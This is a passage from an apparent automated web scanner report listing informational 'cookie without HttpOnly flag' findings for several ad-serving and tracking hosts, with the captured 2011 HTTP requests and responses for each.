
The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/779045?d=17608843913132534 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.adbrite.com
Cookie: Apache=168362101x0.883+1297102923x-1438991006; srh="1%3Aq64FAA%3D%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A12ggb"; rb2=EAE; fq="876fb%2C1uo0%7Clkjpza"

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 02 May 2011 02:37:40 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: rb2=CiEKBjc3OTA0NRjjmuLOEyIRMTc2MDg4NDM5MTMxMzI1MzQQAQ; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:37:40 GMT
Set-Cookie: rb=0:779045:20861280:17608843913132534:0; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:37:40 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
17.69. http://ads.adbrite.com/adserver/vdi/806205  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/806205

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/806205?d=3728e74c-7461-11e0-9185-00259009a9e4&r=http%3A//d.chango.com/m/s/AdBrite%3Fpartner_uid%3D HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.adbrite.com
Cookie: Apache=168362101x0.883+1297102923x-1438991006; srh="1%3Aq64FAA%3D%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A12ggb"; rb2=CjAKBjc2MjcwMRiS-_rNEyIgNDk1MjZCMUIzRkREMDNGQkMxNEREQzUwMDg5QkM4NTAKIQoGNzc5MDQ1GKeL-s0TIhExNzYwODg0MzkxMzEzMjUzNBAB; fq="876fb%2C1uo0%7Clkjpza%7Clkjpze%7Clkjpzs"; rb=0:762701:20861280:49526B1B3FDD03FBC14DDC50089BC850:0:779045:20861280:17608843913132534:0; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUipONEpJrDEszMlIS60xrDGoMSzNN1DSUUpKzMtLLcoEq1GqrQUA"

Response

HTTP/1.1 301 Moved Permanently
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Date: Mon, 02 May 2011 02:39:13 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Location: http://d.chango.com/m/s/AdBrite?partner_uid=MTY4MzYyMTAxeDAuODgzIDEyOTcxMDI5MjN4LTE0Mzg5OTEwMDY
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: rb2=CjAKBjc2MjcwMRiS-_rNEyIgNDk1MjZCMUIzRkREMDNGQkMxNEREQzUwMDg5QkM4NTAKIQoGNzc5MDQ1GKeL-s0TIhExNzYwODg0MzkxMzEzMjUzNAo0CgY4MDYyMDUY7bvluBgiJDM3MjhlNzRjLTc0NjEtMTFlMC05MTg1LTAwMjU5MDA5YTllNBAB; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:39:13 GMT
Set-Cookie: rb=0:762701:20861280:49526B1B3FDD03FBC14DDC50089BC850:0:779045:20861280:17608843913132534:0:806205:20882880:3728e74c-7461-11e0-9185-00259009a9e4:0; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:39:13 GMT
Content-Length: 0

17.70. http://ads2.adbrite.com/v0/ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads2.adbrite.com
Path:   /v0/ad

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v0/ad?sid=1794251&br=1&ifr=1&ref=about%3Ablank&zx=57&zy=158&ww=0&wh=0&fl=0 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads2.adbrite.com
Cookie: Apache=168362101x0.883+1297102923x-1438991006

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Content-Type: application/x-javascript
Set-Cookie: geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; path=/; domain=.adbrite.com; expires=Mon, 09-May-2011 02:35:06 GMT
Set-Cookie: b="%3A%3A12ggb"; path=/; domain=.adbrite.com; expires=Tue, 01-May-2012 02:35:06 GMT
Set-Cookie: srh="1%3Aq64FAA%3D%3D"; path=/; domain=.adbrite.com; expires=Tue, 03-May-2011 02:35:06 GMT
Set-Cookie: rb2=EAE; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:35:06 GMT
Set-Cookie: ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUipONEpJrDEszMnMzawxrDGoMSzNN1DSUUpKzMtLLcoEq1GqrQUA"; path=/; domain=.adbrite.com; expires=Thu, 29-Apr-2021 02:35:06 GMT
Set-Cookie: fq="876fb%2C1uo0%7Clkjr6i"; path=/; domain=.adbrite.com; expires=Tue, 01-May-2012 02:35:06 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Mon, 02 May 2011 02:35:06 GMT
Content-Length: 1630

document.write('<a class=\"adHeadline\" target=\"_top\" onmouseover=\"window.status=\'http://new-electronic-cigarette.com/ab.php\'; return true;\" onmouseout=\"window.status=\' \'; return true;\" href
...[SNIP]...
17.71. http://ads2.adbrite.com/v0/ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads2.adbrite.com
Path:   /v0/ad

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v0/ad?sid=1794248&zs=3330305f323530&ifr=1&ref=http%3A%2F%2Fwebsiteprice.net%2Fresult%2F%3Fid%3D65934&zx=430&zy=1263&ww=1041&wh=903&fl=1 HTTP/1.1
Host: ads2.adbrite.com
Proxy-Connection: keep-alive
Referer: http://websiteprice.net/result/?id=65934
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; srh="1%3Aq64FAA%3D%3D"; b="%3A%3A12ggb%2C6e73"; fq="7l04r%2C1uo0%7Clkjpsr%2C84fok%2C1uo0%7Clkigxp%2C83ol2%2C1uo0%7Clkjpss%2C826ke%2C1uo0%7Clkjpsr"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjAKBjc2MjcwMRiN1OvNEyIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKNAoGODA2MjA1GMDJhpkVIiQwYzJhZWRlNi02YmI2LTExZTAtOGZlNi0wMDI1OTAwYThmZmUQAQ; ut="1%3AHc7LDoMgEIXhd5k1CwarJb4NqBXTKRTwEnV892K3f76TnBNWBe0J72HfQuoztNA5p8cozcoYaZw%2FrNiKrHJCxu%2F%2B8p4NI86HiLE6toJ0laggrEU2qjf3zOnMyJJxCVJkGohKtfMW%2BMmNrUTnqJn25uFL7uVCNwYB1ng%2FpOl%2FA67rBw%3D%3D"; vsd=0@3@4dbe115e@websiteprice.net; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Content-Type: application/x-javascript
Set-Cookie: b="%3A%3A12gg8%2C12ggb%2C6e73"; path=/; domain=.adbrite.com; expires=Tue, 01-May-2012 02:22:25 GMT
Set-Cookie: rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjYKBjc2MjcwMRCd87L6CRi9rqrOEyIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKFAoGNzgyNjA2EL3WyKMKGL2uqs4TCjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:22:25 GMT
Set-Cookie: ut="1%3AHY5LEoMgEAXvMmsWDEZDeRtQI1YmEMBPqePdg9l29et6J6wK2hPew76F1GdooXNOj1GalTHSOH9YsRXZqN7cwOnMyJJxCVLEWB1bobpKVDSsRVY5IeN3f3nPZYDzITINRMWy8xb4yY2tROeomfbm4Qvu5UJ3EgRY4%2F2Qpv8NuK4f"; path=/; domain=.adbrite.com; expires=Thu, 29-Apr-2021 02:22:25 GMT
Set-Cookie: vsd=0@4@4dbe1561@websiteprice.net; path=/; domain=.adbrite.com; expires=Wed, 04-May-2011 02:22:25 GMT
Set-Cookie: fq="7l04r%2C1uo0%7Clkjpsr%2C84fok%2C1uo0%7Clkigxp%2C83ol2%2C1uo0%7Clkjpss%2C84y2m%2C1uo0%7Clkjqld%2C826ke%2C1uo0%7Clkjpsr"; path=/; domain=.adbrite.com; expires=Tue, 01-May-2012 02:22:25 GMT
Set-Cookie: rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:22:25 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Mon, 02 May 2011 02:22:25 GMT
Content-Length: 3164

var AdBrite_Title_Color_Default = '0000FF';
var AdBrite_Text_Color_Default = '000000';
var AdBrite_Background_Color_Default = 'fcfaf3';
var AdBrite_Border_Color_Default = 'fcfaf3';
var AdBrite_URL_Col
...[SNIP]...
17.72. http://ads2.adbrite.com/v0/ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads2.adbrite.com
Path:   /v0/ad

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v0/ad?sid=1794251&br=1&ifr=1&ref=http%3A%2F%2Fwebsiteprice.net%2Fresult%2F%3Fid%3D65934&zx=520&zy=233&ww=1041&wh=903&fl=1 HTTP/1.1
Host: ads2.adbrite.com
Proxy-Connection: keep-alive
Referer: http://websiteprice.net/result/?id=65934
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A6e73"; fq="84fok%2C1uo0%7Clkigxp"; srh="1%3Aq64FAA%3D%3D"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; ut="1%3AHc3LDoMgEIXhd5k1CwZaanwbUCqmFMulEnR895Juv%2F8k54RdwHjCy7a6pTnDCJNzwxK53gmjX8qbBBkWozxqh0Em3wHvLIuckPDTniGQJsRysOyt931lSt3oQcpINjmv1qZuofPMv70SBwZGh2DT%2Bj%2BE6%2FoB"

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Content-Type: application/x-javascript
Set-Cookie: b="%3A%3A12ggb%2C6e73"; path=/; domain=.adbrite.com; expires=Tue, 01-May-2012 02:19:49 GMT
Set-Cookie: ut="1%3AHY1LDoMgFADv8tYseNBS421AqZhSLJ9K0OfdS7qdmWRO2AWMJ7xsq1uaM4wwOTcskeudMPqlvEmQYVnkhISf9gyBNCGWg8Uoj9qjQSbfI7yz7K33nZhSN3qQMpJNzqu1qVvoeObfbokDA6NDsGn9D%2BG6fg%3D%3D"; path=/; domain=.adbrite.com; expires=Thu, 29-Apr-2021 02:19:49 GMT
Set-Cookie: vsd=0@1@4dbe14c5@websiteprice.net; path=/; domain=.adbrite.com; expires=Wed, 04-May-2011 02:19:49 GMT
Set-Cookie: fq="84fok%2C1uo0%7Clkigxp%2C83ol2%2C1uo0%7Clkjqh1%2C826ke%2C1uo0%7Clkjqh1"; path=/; domain=.adbrite.com; expires=Tue, 01-May-2012 02:19:49 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Mon, 02 May 2011 02:19:49 GMT
Content-Length: 4307

document.write('<a class=\"adHeadline\" target=\"_top\" onmouseover=\"window.status=\'http://www.cheapezfast.com\'; return true;\" onmouseout=\"window.status=\' \'; return true;\" href=\"http://click.
...[SNIP]...
17.73. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=3005617&rn=709336356&c7=http%3A%2F%2Fwww.washingtonpost.com%2Fwl%2Fjobs%2Fhome%3Fwpsrc%3DAG0002174%26keyword%3D4846831919%26cre%3D430450907%26g%3D1%26s_kwcid%3DTC-21380-4846831919-e-430450907&c8=Washington%20DC%20Area%20Jobs%20%26%20Careers%3A%20Find%20Your%2&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Sun, 01 May 2011 23:34:41 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Tue, 30-Apr-2013 23:34:41 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

17.74. http://bdv.bidvertiser.com/bidvertiser.dbm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bdv.bidvertiser.com
Path:   /bidvertiser.dbm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bidvertiser.dbm?pid=349166&bid=862453&RD=89&DIF=2&bd_ref_v=&tref=1&win_name=null&docref=&jsrand=24578&js1loc=about%3Ablank HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: bdv.bidvertiser.com

Response

HTTP/1.1 200 OK
Date: Monday, 02-May-2011 02:34:42 GMT
Cache-Control: no-store
Last-Modified: Sunday, 02-May-2010 02:34:42 GMT
Set-Cookie: bdv_c5p=214590_41999682_1; domain=.bidvertiser.com; path=/; expires=Tue, 03-May-2011 02:34:42 GMT
Set-Cookie: fre5_krp=214590_41999682_1; domain=.bidvertiser.com; path=/; expires=Mon, 09-May-2011 02:34:42 GMT
P3P: policyref="http://www.bidvertiser.com/bdv/bidvertiser/p3p.xml", CP="NOI DEV PSA PSD IVA OTP OUR OTR IND OTC"
Content-Type: text/html; charset=ISO-8859-1
Content-Len: 384
Warning: 214 "Juniper Networks DX Active"
Vary: Accept-Encoding, User-Agent
Content-Length: 384

var PUC="http://www.hyperpromote.com/tags/showaon.html?bvgeocode=US&bvlocationcode=862453&bvurl=" + encodeURI(document.location) + "&bvtitle=" + escape(document.title);
var bv_freq=21600;
var temp_s
...[SNIP]...
17.75. http://bh.contextweb.com/bh/rtset  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/rtset

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/rtset?do=add&pid=530741&ev=c1e1301e-3a1f-4ca7-9870-f636b5f10e66&cb=3w3v1p&rurl=http%3A%2F%2Fa.triggit.com%2Fpxcwcm HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|530741.c1e1301e-3a1f-4ca7-9870-f636b5f10e66.0|535461.2931142961646634775.1; V=wOebwAz4UvVv; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun GlassFish Enterprise Server v2.1
CW-Server: cw-web82
Cache-Control: no-cache, no-store
Set-Cookie: V=wOebwAz4UvVv; Domain=.contextweb.com; Expires=Thu, 26-Apr-2012 02:01:51 GMT; Path=/
Set-Cookie: pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|530741.c1e1301e-3a1f-4ca7-9870-f636b5f10e66.0|535461.2931142961646634775.1; Domain=.contextweb.com; Expires=Tue, 01-May-2012 02:01:51 GMT; Path=/
Location: http://a.triggit.com/pxcwcm
Content-Type: text/html; charset=iso-8859-1
Content-Length: 0
Date: Mon, 02 May 2011 02:01:50 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

17.76. http://bing.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bing.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: bing.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; _UR=; s_nr=1303567291710; SRCHD=MS=1744674&SM=1&D=1740336&AF=NOFORM; MUID=B506C07761D7465D924574124E3C14DF; s_vnum=1306159291712%26vn%3D2; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; countrycode=US; zipcode=75207

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 0
Location: http://www.bing.com/
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Edge-control: no-store
Set-Cookie: _HOP=I=1&TS=1304292748; domain=bing.com; path=/
Date: Sun, 01 May 2011 23:32:28 GMT

17.77. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2193540&PluID=0&w=160&h=600&64cd0da313&ncu=http://d1.openx.org/ck.php?oaparams=2__bannerid=522976__zoneid=0__OXLCA=1__cb=64cd0da313__r_id=85dbdb9e09296233a4d7b328928878f8__r_ts=lkjpfk__oadest=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBIsVPfQ--TffUN9q86QaO0KkvyMnAgAKQ3aCnJriw6u9EABABGAEgADgBUIDH4cQEYMnug4jwo-wSggEXY2EtcHViLTcyNTExNzM2MDIxMjU3NzWgAeDq_toDsgERd3d3LmphcGFuYXRvci5jb226AQoxNjB4NjAwX2FzyAEJ2gEtaHR0cDovL3d3dy5qYXBhbmF0b3IuY29tL2VsZXBoYW50L2xvZ2luLnBodG1smAKOAsACBMgCgOr2FqgDAegDvQL1AwAAAOQ%26num%3D1%26sig%3DAGiWqtwQa1xoRafBymiCbfwPHRB1hm9EPA%26client%3Dca-pub-7251173602125775%26adurl%3D%3Bcb%3D1442324580http%253A%252F%252Fwww.zipcar.com%252Fwebchi3col75&ucm=true&ncu=$$%c$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://d1.openx.org/afr.php?resize=1&campaignid=246606&what=chi160x600&ct0=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBIsVPfQ--TffUN9q86QaO0KkvyMnAgAKQ3aCnJriw6u9EABABGAEgADgBUIDH4cQEYMnug4jwo-wSggEXY2EtcHViLTcyNTExNzM2MDIxMjU3NzWgAeDq_toDsgERd3d3LmphcGFuYXRvci5jb226AQoxNjB4NjAwX2FzyAEJ2gEtaHR0cDovL3d3dy5qYXBhbmF0b3IuY29tL2VsZXBoYW50L2xvZ2luLnBodG1smAKOAsACBMgCgOr2FqgDAegDvQL1AwAAAOQ%26num%3D1%26sig%3DAGiWqtwQa1xoRafBymiCbfwPHRB1hm9EPA%26client%3Dca-pub-7251173602125775%26adurl%3D;cb=1442324580&
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
